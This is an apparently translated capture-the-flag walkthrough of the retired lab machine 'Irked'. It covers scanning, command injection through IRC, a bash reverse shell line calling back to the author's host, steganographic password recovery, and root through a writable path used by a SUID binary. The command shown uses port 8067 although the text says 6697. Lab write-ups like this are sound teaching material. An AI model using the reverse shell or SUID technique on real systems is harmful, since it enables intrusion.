The Irked machine is a machine with Linux operating system among the retired machines.
We’re doing a target scan.
classic scan
TCP Port Full scan
UDP Full Scan
Here are the ports that are open in order
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
6697/tcp open ircs-u
8067/tcp open infi-async
34900/tcp open unknown
65534/tcp open unknown
Among these ports, what draws our attention is 6697.port, which does not skip the classic scan and comes out with a full port scan. To see the details of the service running on this port;
The irc protocol is running on this port. We take this with us as additional information for now.
80.port http protocol works, we access the service via browser
We perform a directory scan we have provided with gobuster
We were unable to find any significant information in directory discovery
One thing about IRC draws our attention on the web service.
That’s why we focus on 6697.port that IRC runs.
Let’s connect IRC with ncat
nc 10.10.10.117 8067
We got a hostname error while connecting. We edit the /etc/hosts file and reconnect.
(received error)
Hostname added
Reconnecting
After the connection is established, we transmit the ping command to test whether the sent command works.
As you can see the command is working.
We can give a revershell to our own machine like this.
To give bash revershell
bash -c “bash -i >& /dev/tcp/10.10.14.3/1234 0>&1”
we will use the command on the side, we will run ncat on the back
We got our revershel
We couldn’t get our userflags. We got Permission denied error constantly.
We perform enumeration to gain privilege escalation on the machine.
We could not obtain information in the enumeration part, I got help here. We are expected to download the jpg file and extract the data in it with stegonagraphic methods.
With the obtained password, djmardov ssh connection is made.
In this way, we were able to obtain the user flag.
We tried to go to the root folder, but we got the permission denied error, here we are asked for privelege escalation.
It would perform enumeration again to raise authority. I used LinEnum.sh tool because manual enumeration takes a long time
The viewuser suid files are focused due to time difference when the output is inspected
Viewuser executed
Here /tmp/listusers says not found, there is no file here, apparently we will try to add a file here.
We created it, this time we got a permision deny error
Let’s give run permission to this file here
After the permission is defined, view user can be run
We saw that it returns the id value
Now you will be asked to give a shell with the sh command
As you can see, we got root permission 😊